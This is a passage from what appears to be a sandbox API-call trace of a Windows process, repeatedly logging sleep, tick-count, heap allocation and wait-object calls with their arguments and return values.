(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.714] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.718] GetTickCount () returned 0x2119f3b [0188.718] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64df0 [0188.718] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.718] GetTickCount () returned 0x2119f3b [0188.718] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.718] GetTickCount () returned 0x2119f3b [0188.718] GetTickCount () returned 0x2119f3b [0188.718] GetTickCount () returned 0x2119f3b [0188.718] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.718] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.718] GetTickCount () returned 0x2119f3b [0188.718] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.718] GetTickCount () returned 0x2119f3b [0188.718] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.718] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64df0 | out: hHeap=0x2150000) returned 1 [0188.718] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.719] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.721] GetTickCount () returned 0x211a7d1 [0188.721] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64c30 [0188.721] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.721] GetTickCount () returned 0x211a7d1 [0188.721] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.721] GetTickCount () returned 0x211a7d1 [0188.721] GetTickCount () returned 0x211a7d1 [0188.721] GetTickCount () returned 0x211a7d1 [0188.721] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.721] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.721] GetTickCount () returned 0x211a7d1 [0188.721] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.721] GetTickCount () returned 0x211a7d1 [0188.721] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.721] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64c30 | out: hHeap=0x2150000) returned 1 [0188.721] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.722] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.724] GetTickCount () returned 0x211b067 [0188.724] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e651f0 [0188.724] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.724] GetTickCount () returned 0x211b067 [0188.724] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.724] GetTickCount () returned 0x211b067 [0188.724] GetTickCount () returned 0x211b067 [0188.724] GetTickCount () returned 0x211b067 [0188.724] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.724] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.724] GetTickCount () returned 0x211b067 [0188.724] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.724] GetTickCount () returned 0x211b067 [0188.724] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.724] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e651f0 | out: hHeap=0x2150000) returned 1 [0188.724] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.726] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.728] GetTickCount () returned 0x211b90c [0188.728] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64bf0 [0188.728] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.728] GetTickCount () returned 0x211b90c [0188.728] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.728] GetTickCount () returned 0x211b90c [0188.728] GetTickCount () returned 0x211b90c [0188.728] GetTickCount () returned 0x211b90c [0188.728] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.728] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.728] GetTickCount () returned 0x211b90c [0188.728] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.728] GetTickCount () returned 0x211b90c [0188.728] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.728] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64bf0 | out: hHeap=0x2150000) returned 1 [0188.728] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.730] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.733] GetTickCount () returned 0x211c1a2 [0188.733] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64db0 [0188.733] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.733] GetTickCount () returned 0x211c1a2 [0188.733] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.733] GetTickCount () returned 0x211c1a2 [0188.733] GetTickCount () returned 0x211c1a2 [0188.733] GetTickCount () returned 0x211c1a2 [0188.734] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.734] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.734] GetTickCount () returned 0x211c1a2 [0188.734] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.734] GetTickCount () returned 0x211c1a2 [0188.734] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.734] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64db0 | out: hHeap=0x2150000) returned 1 [0188.734] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.735] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.736] GetTickCount () returned 0x211ca38 [0188.736] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64b70 [0188.736] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.737] GetTickCount () returned 0x211ca38 [0188.737] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.737] GetTickCount () returned 0x211ca38 [0188.737] GetTickCount () returned 0x211ca38 [0188.737] GetTickCount () returned 0x211ca38 [0188.737] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.737] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.737] GetTickCount () returned 0x211ca38 [0188.737] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.737] GetTickCount () returned 0x211ca38 [0188.737] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.737] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64b70 | out: hHeap=0x2150000) returned 1 [0188.737] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.739] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.740] GetTickCount () returned 0x211d2ce [0188.740] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e651b0 [0188.740] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.741] GetTickCount () returned 0x211d2ce [0188.741] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.741] GetTickCount () returned 0x211d2ce [0188.741] GetTickCount () returned 0x211d2ce [0188.741] GetTickCount () returned 0x211d2ce [0188.741] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.741] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.741] GetTickCount () returned 0x211d2ce [0188.741] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.741] GetTickCount () returned 0x211d2ce [0188.741] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.741] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e651b0 | out: hHeap=0x2150000) returned 1 [0188.741] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.742] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.744] GetTickCount () returned 0x211db74 [0188.744] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e650b0 [0188.744] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.744] GetTickCount () returned 0x211db74 [0188.744] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.744] GetTickCount () returned 0x211db74 [0188.744] GetTickCount () returned 0x211db74 [0188.744] GetTickCount () returned 0x211db74 [0188.744] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.744] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.744] GetTickCount () returned 0x211db74 [0188.744] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.744] GetTickCount () returned 0x211db74 [0188.744] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.744] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e650b0 | out: hHeap=0x2150000) returned 1 [0188.744] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.746] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.749] GetTickCount () returned 0x211e40a [0188.749] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64fb0 [0188.749] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.749] GetTickCount () returned 0x211e40a [0188.749] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.749] GetTickCount () returned 0x211e40a [0188.749] GetTickCount () returned 0x211e40a [0188.749] GetTickCount () returned 0x211e40a [0188.749] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.749] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.749] GetTickCount () returned 0x211e40a [0188.749] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.749] GetTickCount () returned 0x211e40a [0188.749] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.749] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64fb0 | out: hHeap=0x2150000) returned 1 [0188.750] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.751] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.752] GetTickCount () returned 0x211eca0 [0188.752] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e651f0 [0188.752] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.753] GetTickCount () returned 0x211eca0 [0188.753] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.753] GetTickCount () returned 0x211eca0 [0188.753] GetTickCount () returned 0x211eca0 [0188.753] GetTickCount () returned 0x211eca0 [0188.753] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.753] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.753] GetTickCount () returned 0x211eca0 [0188.753] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.753] GetTickCount () returned 0x211eca0 [0188.753] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.753] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e651f0 | out: hHeap=0x2150000) returned 1 [0188.753] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.754] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.756] GetTickCount () returned 0x211f536 [0188.756] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65070 [0188.756] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.756] GetTickCount () returned 0x211f536 [0188.756] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.756] GetTickCount () returned 0x211f536 [0188.756] GetTickCount () returned 0x211f536 [0188.756] GetTickCount () returned 0x211f536 [0188.756] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.756] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.757] GetTickCount () returned 0x211f536 [0188.757] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.757] GetTickCount () returned 0x211f536 [0188.757] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.757] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65070 | out: hHeap=0x2150000) returned 1 [0188.757] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.758] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.759] GetTickCount () returned 0x211fddc [0188.759] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64c70 [0188.759] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.760] GetTickCount () returned 0x211fddc [0188.760] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.760] GetTickCount () returned 0x211fddc [0188.760] GetTickCount () returned 0x211fddc [0188.760] GetTickCount () returned 0x211fddc [0188.760] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.760] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.760] GetTickCount () returned 0x211fddc [0188.760] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.760] GetTickCount () returned 0x211fddc [0188.760] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.760] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64c70 | out: hHeap=0x2150000) returned 1 [0188.760] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.761] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.765] GetTickCount () returned 0x2120672 [0188.765] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65130 [0188.765] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.765] GetTickCount () returned 0x2120672 [0188.765] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.765] GetTickCount () returned 0x2120672 [0188.765] GetTickCount () returned 0x2120672 [0188.765] GetTickCount () returned 0x2120672 [0188.765] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.765] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.765] GetTickCount () returned 0x2120672 [0188.765] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.765] GetTickCount () returned 0x2120672 [0188.765] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.765] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65130 | out: hHeap=0x2150000) returned 1 [0188.765] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.768] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.770] GetTickCount () returned 0x2120f08 [0188.770] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64fb0 [0188.770] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.770] GetTickCount () returned 0x2120f08 [0188.770] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.770] GetTickCount () returned 0x2120f08 [0188.770] GetTickCount () returned 0x2120f08 [0188.770] GetTickCount () returned 0x2120f08 [0188.770] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.770] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.770] GetTickCount () returned 0x2120f08 [0188.770] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.770] GetTickCount () returned 0x2120f08 [0188.770] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.770] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64fb0 | out: hHeap=0x2150000) returned 1 [0188.770] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.772] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.773] GetTickCount () returned 0x21217ad [0188.773] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64fb0 [0188.773] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.773] GetTickCount () returned 0x21217ad [0188.773] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.773] GetTickCount () returned 0x21217ad [0188.773] GetTickCount () returned 0x21217ad [0188.773] GetTickCount () returned 0x21217ad [0188.773] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.773] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.773] GetTickCount () returned 0x21217ad [0188.773] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.773] GetTickCount () returned 0x21217ad [0188.773] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.774] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64fb0 | out: hHeap=0x2150000) returned 1 [0188.774] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.775] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.781] GetTickCount () returned 0x2122043 [0188.782] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65170 [0188.782] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.782] GetTickCount () returned 0x2122043 [0188.782] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.782] GetTickCount () returned 0x2122043 [0188.782] GetTickCount () returned 0x2122043 [0188.782] GetTickCount () returned 0x2122043 [0188.782] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.782] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.782] GetTickCount () returned 0x2122043 [0188.782] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.782] GetTickCount () returned 0x2122043 [0188.782] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.782] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65170 | out: hHeap=0x2150000) returned 1 [0188.782] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.783] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.785] GetTickCount () returned 0x21228d9 [0188.785] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64c70 [0188.785] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.785] GetTickCount () returned 0x21228d9 [0188.785] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.785] GetTickCount () returned 0x21228d9 [0188.785] GetTickCount () returned 0x21228d9 [0188.785] GetTickCount () returned 0x21228d9 [0188.785] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.785] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.785] GetTickCount () returned 0x21228d9 [0188.785] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.785] GetTickCount () returned 0x21228d9 [0188.785] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.785] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64c70 | out: hHeap=0x2150000) returned 1 [0188.785] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.787] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.788] GetTickCount () returned 0x212317f [0188.788] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64bf0 [0188.788] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.788] GetTickCount () returned 0x212317f [0188.788] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.788] GetTickCount () returned 0x212317f [0188.788] GetTickCount () returned 0x212317f [0188.788] GetTickCount () returned 0x212317f [0188.788] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.788] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.788] GetTickCount () returned 0x212317f [0188.788] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.788] GetTickCount () returned 0x212317f [0188.788] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.789] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64bf0 | out: hHeap=0x2150000) returned 1 [0188.789] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.790] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.792] GetTickCount () returned 0x2123a15 [0188.792] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64c30 [0188.792] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.792] GetTickCount () returned 0x2123a15 [0188.792] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.792] GetTickCount () returned 0x2123a15 [0188.792] GetTickCount () returned 0x2123a15 [0188.792] GetTickCount () returned 0x2123a15 [0188.792] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.792] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.792] GetTickCount () returned 0x2123a15 [0188.792] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.792] GetTickCount () returned 0x2123a15 [0188.792] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.792] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64c30 | out: hHeap=0x2150000) returned 1 [0188.792] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.794] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.797] GetTickCount () returned 0x21242ab [0188.797] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65130 [0188.797] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.797] GetTickCount () returned 0x21242ab [0188.797] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.797] GetTickCount () returned 0x21242ab [0188.797] GetTickCount () returned 0x21242ab [0188.797] GetTickCount () returned 0x21242ab [0188.797] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.797] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.797] GetTickCount () returned 0x21242ab [0188.797] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.797] GetTickCount () returned 0x21242ab [0188.797] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.797] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65130 | out: hHeap=0x2150000) returned 1 [0188.797] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.799] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.800] GetTickCount () returned 0x2124b41 [0188.800] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64bb0 [0188.800] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.800] GetTickCount () returned 0x2124b41 [0188.800] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.800] GetTickCount () returned 0x2124b41 [0188.800] GetTickCount () returned 0x2124b41 [0188.800] GetTickCount () returned 0x2124b41 [0188.800] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.800] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.800] GetTickCount () returned 0x2124b41 [0188.800] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.800] GetTickCount () returned 0x2124b41 [0188.800] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.801] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64bb0 | out: hHeap=0x2150000) returned 1 [0188.801] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.802] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.804] GetTickCount () returned 0x21253d7 [0188.804] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 